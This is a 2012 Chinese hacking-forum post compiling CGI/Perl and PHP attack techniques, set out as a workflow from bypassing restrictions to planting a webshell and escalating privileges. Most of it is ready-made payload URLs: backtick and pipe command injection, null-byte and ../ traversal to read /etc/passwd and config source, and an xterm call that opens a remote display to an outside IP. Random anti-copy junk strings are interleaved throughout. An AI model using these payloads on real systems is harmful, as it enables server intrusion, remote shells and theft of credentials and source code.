找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2589|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
) D2 F( I" s3 z3 O: S3 e* F0 Q3 Gcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
1 Y& \% c6 _; P9 |7 t感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
% M0 u8 e8 z! M; a  W注“  , A) A6 @* c$ H) u" K, a
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  6 ^$ @' T% c. {4 A( E; P# `
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
1 b% k; y- }: y, t9 K- l: H0 a9 n) N( U8 `
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  * i# A- T/ q. \- y+ m
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  ' y6 M/ j6 ~' q$ a
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  : X& K! {' d$ F' Q
http://target.com/cgi-bin/home/news/sub.pl?`id`  * j* e% G' W  d2 r2 E& ~# y5 h
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
0 a+ H& L' A9 R6 qhttp://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  : P% s' ^0 e- p
, b4 c1 d6 T. z; ^2 c
http://target.com/test.pl;ls|  
! ~6 }5 V- B% s8 g* c2 ohttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
; f$ k/ `2 D- P4 e  T, c) |7 |http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  2 h/ j6 V2 h: q% U/ _- v2 U
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  0 I# C5 T: w) h9 t
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
" r/ S5 C0 V2 I+ s1 [& Lhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  ! b6 Y- j! v9 B0 A) z3 V
. ~: F% O0 _8 t# q2 R$ b8 L
http://target.com/test.pl?&........ /../../etc/passwd  : N' ~0 r. U" r: f6 U! v' c
3 K8 A  k0 ?- c1 H
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  + K9 {, `* H4 L; _8 V0 [$ [& Q' @
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  4 d: j7 \, \' s" n- y( N! J0 }
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  + Z+ X# x. P+ D2 Y/ Y; {( b

5 b% ~, q5 b, v# y- o8 A6 Phttp://www.target.org/show.php?f ... /include/config.php 查看php代码  + I3 F. g) X4 k, ~) b
http://www.target.org/show.php?f ... ng/admin/global.php  
3 H% l, W7 a9 I
! b1 O" g8 H% O6 r; ~) Vemm和ps的一句话* S* h) @1 o2 M2 l0 J. n& e
. @+ S; v% M4 h' y2 r* n7 J+ W% `- G
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  ) A. _9 N2 f( G2 N. z5 ^& t

$ L- R5 h1 E  N) a>bbb%20|  
2 }5 |9 N& ~* o8 {& n# L# h/ b9 n$ e, e5 N
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
' k( T5 x2 x: V/ x: H; r7 d/ n' A, @9 `  R$ H9 i! A7 i2 g& @
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  4 R  Y; ^6 G' h$ j5 A* j$ w5 Y
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
- K; t  y* P, k: U* e' [4 n2 ~- z6 F' M
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
+ F& h7 u  s4 ^# G0 Khttp://target.com/index.html#cmd.exe  ) k: d. j0 @  ~3 b
http://target.com/index.html?dummyparam=xp_cmdshell  * s8 R( j4 u# u( ~& ?4 u; Q" b) D0 u  R
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
0 I4 a2 o# _1 A3 x; J0 W* h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表